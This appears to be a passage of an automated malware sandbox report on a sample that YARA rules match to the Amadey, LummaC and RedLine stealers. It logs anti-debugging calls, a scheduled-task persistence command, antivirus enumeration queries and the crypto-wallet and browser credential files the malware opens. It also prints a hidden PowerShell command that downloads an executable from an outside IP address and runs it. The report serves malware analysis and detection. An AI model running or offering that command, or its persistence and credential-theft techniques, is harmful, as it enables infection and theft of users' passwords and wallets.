                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 11_2_00BBA302 mov eax, dword ptr fs:[00000030h]11_2_00BBA302
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 12_2_00BBA302 mov eax, dword ptr fs:[00000030h]12_2_00BBA302
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 12_2_00BB652B mov eax, dword ptr fs:[00000030h]12_2_00BB652B
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 13_2_0033A302 mov eax, dword ptr fs:[00000030h]13_2_0033A302
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 13_2_0033652B mov eax, dword ptr fs:[00000030h]13_2_0033652B
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_0033A302 mov eax, dword ptr fs:[00000030h]14_2_0033A302
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_0033652B mov eax, dword ptr fs:[00000030h]14_2_0033652B
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00370B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00370B62
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00342622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00342622
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0033083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0033083F
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_003309D5 SetUnhandledExceptionFilter,0_2_003309D5
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00330C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00330C21
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeMemory allocated: page read and write | page guard

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Yara detected Powershell download and execute
                            Source: Yara matchFile source: amsi32_7132.amsi.csv, type: OTHER
                            Source: Yara matchFile source: amsi64_3544.amsi.csv, type: OTHER
                            Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 5160, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7132, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 5644, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3544, type: MEMORYSTR
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00371201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00371201
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00352BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00352BA5
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0037B226 SendInput,keybd_event,0_2_0037B226
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_003922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_003922DA
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn PzPPLma0H6r /tr "mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta" /sc minute /mo 25 /ru "user" /fJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE "C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE" Jump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE "C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exe "C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exe"
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exe "C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exe"
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exe "C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exe"
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00370B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00370B62
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00371663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00371663
                            Source: random.exe, tmp2E19.tmp.21.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                            Source: 8c36d696e4.exe, 00000015.00000002.4319785050.0000000000CBB000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: ]Program Manager
                            Source: random.exeBinary or memory string: Shell_TrayWnd
                            Source: 28f48f066a.exe, 00000014.00000002.2855129990.0000000000A7F000.00000040.00000001.01000000.00000011.sdmpBinary or memory string: vProgram Manager
                            Source: 0dd40f41c4.exe, 00000017.00000002.4600523435.000000000114A000.00000040.00000001.01000000.00000014.sdmpBinary or memory string: ,MW1Program Manager
                            Source: 0dd40f41c4.exe, 00000017.00000002.4600523435.000000000114A000.00000040.00000001.01000000.00000014.sdmpBinary or memory string: o,MW1Program Manager
                            Source: skotes.exe, skotes.exe, 0000000E.00000002.2268966714.000000000053F000.00000040.00000001.01000000.0000000F.sdmp, skotes.exe, 00000012.00000002.4599725643.000000000053F000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: JProgram Manager
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00330698 cpuid 0_2_00330698
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0036D21C GetLocalTime,0_2_0036D21C
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0036D27A GetUserNameW,0_2_0036D27A
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0034B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0034B952
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_003142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003142DE
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: 28f48f066a.exe, 00000014.00000003.2806123768.0000000005D8D000.00000004.00000800.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000003.4144657698.000000000882B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Amadey
                            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                            Yara detected Amadeys stealer DLL
                            Source: Yara matchFile source: 14.2.skotes.exe.300000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE.b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE.b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.skotes.exe.300000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.skotes.exe.300000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000003.2235414264.00000000046C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000003.2199027455.00000000051D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.4596649180.0000000000301000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000003.2227655052.0000000004950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.2282938840.0000000000B81000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000003.2605801999.0000000004970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.2239446110.0000000000B81000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000003.2223700815.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.2268191874.0000000000301000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                            Yara detected LummaC Stealer
                            Source: Yara matchFile source: Process Memory Space: 28f48f066a.exe PID: 3640, type: MEMORYSTR
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Source: Yara matchFile source: Process Memory Space: 0dd40f41c4.exe PID: 3468, type: MEMORYSTR
                            Yara detected RedLine Stealer
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 21.2.8c36d696e4.exe.b10000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000015.00000002.4319695523.0000000000B12000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000015.00000003.3956964167.0000000005050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000015.00000002.4325422315.00000000054A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 8c36d696e4.exe PID: 1216, type: MEMORYSTR
                            Found many strings related to Crypto-Wallets (likely being stolen)
                            Source: 28f48f066a.exe, 00000014.00000003.2843550865.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                            Source: 28f48f066a.exe, 00000014.00000003.2843550865.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005599000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q4C:\Users\user\AppData\Roaming\Electrum\wallets\*
                            Source: 28f48f066a.exe, 00000014.00000003.2806309207.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: bdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmh
                            Source: 28f48f066a.exe, 00000014.00000003.2843550865.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005599000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005599000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                            Source: 28f48f066a.exe, 00000014.00000003.2806309207.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,"ez":"Sui"},{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"eH
                            Source: 28f48f066a.exe, 00000014.00000003.2843550865.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                            Source: 28f48f066a.exe, 00000014.00000003.2795666430.0000000001617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsm
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005599000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q8C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                            Source: powershell.exe, 00000006.00000002.2201144931.0000000007CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
